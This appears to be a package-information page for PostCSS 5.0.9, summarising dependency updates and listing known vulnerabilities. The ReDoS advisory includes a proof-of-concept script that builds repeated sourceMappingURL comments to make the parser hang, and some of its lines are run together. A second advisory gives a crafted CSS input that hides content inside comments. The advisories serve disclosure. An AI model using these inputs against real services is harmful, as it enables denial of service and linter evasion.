PostCSS version 5.0.9 represents a minor update to the popular JavaScript tool for transforming styles with plugins, building upon the capabilities of version 5.0.8. While the core description remains consistent, several dependency updates and internal tooling enhancements distinguish the two releases. A key dependency update involves the source-map package, moving from version 0.5.0 to 0.5.1, potentially offering improvements in source map generation and debugging support for developers. In the realm of development dependencies, several changes are notable. Sinon, a testing utility, sees an update from version 1.16.1 to 1.17.1. ESLint, a JavaScript linter, jumps from version 1.5.0 to 1.6.0, likely incorporating new linting rules and code style checks. Isparta, a code coverage tool, is updated from 3.0.4 to 3.1.0, potentially providing enhanced coverage reporting. Crucially, gulp-shell is upgraded from version 0.4.3 to 0.5.0, and run-sequence from 1.1.3 to 1.1.4, and gulp-istanbul from 0.10.0 to 0.10.1, potentially impacting build processes and task execution. Finally concat-with-sourcemaps has been updated from 1.0.2 to 1.0.4. These updates suggest a focus on improving the development workflow, testing environment, and code quality associated with PostCSS. Developers upgrading from 5.0.8 should review the changelogs for each updated development dependency to understand the specific changes and potential impact on their projects using PostCSS.
All the vulnerabilities related to the version 5.0.9 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.